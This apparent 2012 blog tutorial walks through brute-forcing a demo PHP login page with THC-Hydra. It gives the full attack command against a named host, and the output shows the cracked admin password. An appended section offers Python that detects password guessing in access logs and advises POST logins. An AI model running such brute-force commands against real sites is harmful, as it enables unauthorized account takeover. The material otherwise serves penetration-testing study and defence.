201 Brute Force - THC-Hydra 4
Posted on 2012-10-4 22:02:45
Look at this PHP code:

    <?php
    // Demo login check: credentials are hard-coded and arrive in the GET query string.
    if(isset($_GET["usr"]) && isset($_GET["pwd"])) {
      if($_GET["usr"]=="admin" && $_GET["pwd"]=="123456") {
        header("Location: http://www.google.com");
      } else {
        // Failed login: this response text is the failure keyword used below.
        echo("f0ck you");
      }
    }
    ?>
    <html>
      <body>
        <form action="test.php" method="get">
          <input type="text" name="usr" />
          <input type="password" name="pwd" />
          <input type="submit" name="login" value="Connect" />
        </form>
      </body>
    </html>

It is an HTTP form, so check the module help:

    root@Dis9Team:~# hydra -U http-post-form
    Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

    Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 00:56:55

    Help for module http-post-form:
    ============================================================================
    Module http-post-form requires the page and the parameters for the web form.

    By default this module is configured to follow a maximum of 5 redirections in
    a row. It always gathers a new cookie from the same URL without variables
    The parameters take three ":" separated values, plus optional values.

    Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
    First is the page on the server to GET or POST to (URL).
    Second is the POST/GET variables (taken from either the browser, proxy, etc.
    with usernames and passwords being replaced in the "^USER^" and "^PASS^"
    placeholders (FORM PARAMETERS)
    Third is the string that it checks for an *invalid* login (by default)
    Invalid condition login check can be preceded by "F=", successful condition
    login check must be preceded by "S=".
    This is where most people get it wrong. You have to check the webapp what a
    failed string looks like and put it in this parameter!
    The following parameters are optional:
    C=/page/uri     to define a different page to gather initial cookies from
    H=My-Hdr: foo   to send a user defined HTTP header with each request
    Examples:
    "/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect"
    "/login.php:user=^USER^&pass=^PASS^&mid=123:S=authlog=.*success"
    "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
    "/login:user=^USER&pass=^PASS:failed:H=Authorization: Basic dT1w:H=X-Foo: Bar"
    "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"
    root@Dis9Team:~#

The failure keyword is f0ck you. First capture the request:
http://fuzzexp.org/pen/test.php?usr=admin&pwd=11111&login=Connect
The form is submitted with GET. Build the command:

    hydra -l admin -P /tmp/password -s 80 -f fuzzexp.org http-post-form "/pen/test.php?usr=admin&pwd=11111&login=Connect:f0ck"

Replace the username and password with the placeholders from the example:
login.php:user=^USER^&pass=^PASS^&mid=123:incorrect

    root@Dis9Team:~# hydra -l admin -P /tmp/password -s 80 -f fuzzexp.org http-post-form "/pen/test.php:usr=^USER^&pwd=^PASS^&login=Connect:f0ck"
    Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

    Hydra (http://www.thc.org/thc-hydra) starting at 2012-07-25 01:04:29
    [DATA] 3 tasks, 1 server, 3 login tries (l:1/p:3), ~1 try per task
    [DATA] attacking service http-post-form on port 80
    [80][www-form] host: 63.223.79.168   login: admin   password: 123456
    [STATUS] attack finished for fuzzexp.org (valid pair found)
    1 of 1 target successfuly completed, 1 valid password found
    Hydra (http://www.thc.org/thc-hydra) finished at 2012-07-25 01:04:46
    root@Dis9Team:~#

[80][www-form] host: 63.223.79.168   login: admin   password: 123456
The password was cracked successfully.
:f0ck is the failure keyword.
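
Added example, not part of the original post: because the form above submits usr and pwd in the GET query string, every guess is written to the web server's access log, so the guessing run can be detected there. The sketch below flags a source IP that tries several distinct passwords for one user within a short window; the log lines, IP addresses, threshold and window are constructed assumptions, and the combined log format is assumed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [25/Jul/2012:01:04:30 +0800] "GET /pen/test.php?usr=admin&pwd=password&login=Connect HTTP/1.0" 200 310 "-" "-"
198.51.100.7 - - [25/Jul/2012:01:04:35 +0800] "GET /pen/test.php?usr=admin&pwd=letmein&login=Connect HTTP/1.0" 200 310 "-" "-"
198.51.100.7 - - [25/Jul/2012:01:04:46 +0800] "GET /pen/test.php?usr=admin&pwd=123456&login=Connect HTTP/1.0" 302 0 "-" "-"
203.0.113.9 - - [25/Jul/2012:01:10:02 +0800] "GET /pen/test.php?usr=admin&pwd=123456&login=Connect HTTP/1.1" 302 0 "-" "-"
203.0.113.9 - - [25/Jul/2012:01:10:03 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "-"
192.0.2.5 - - [25/Jul/2012:01:00:00 +0800] "GET /pen/test.php?usr=admin&pwd=a1&login=Connect HTTP/1.1" 200 310 "-" "-"
192.0.2.5 - - [25/Jul/2012:02:00:00 +0800] "GET /pen/test.php?usr=admin&pwd=a2&login=Connect HTTP/1.1" 200 310 "-" "-"
192.0.2.5 - - [25/Jul/2012:03:00:00 +0800] "GET /pen/test.php?usr=admin&pwd=a3&login=Connect HTTP/1.1" 200 310 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) [^"]*"')

def parse_attempts(log_text, login_path="/pen/test.php"):
    """Yield (ip, time, user, password) for each GET that submits usr and pwd."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        url = urlsplit(target)
        qs = parse_qs(url.query)
        if url.path != login_path or "usr" not in qs or "pwd" not in qs:
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        yield ip, when, qs["usr"][0], qs["pwd"][0]

def find_guessing(log_text, min_distinct=3, window=timedelta(seconds=60)):
    """Return {(ip, user): n} where one IP tried n >= min_distinct passwords in a window."""
    tries = defaultdict(list)
    for ip, when, user, pwd in parse_attempts(log_text):
        tries[(ip, user)].append((when, pwd))
    flagged = {}
    for key, events in tries.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            distinct = {p for t, p in events[i:] if t - start <= window}
            if len(distinct) >= min_distinct:
                flagged[key] = max(flagged.get(key, 0), len(distinct))
    return flagged

if __name__ == "__main__":
    for (ip, user), n in find_guessing(SAMPLE_LOG).items():
        print(f"{ip} tried {n} passwords for '{user}' within 60s")
```

The same log lines also show that a GET login form leaves plaintext passwords in the access log, which is a reason to submit credentials with POST and to restrict who can read the logs.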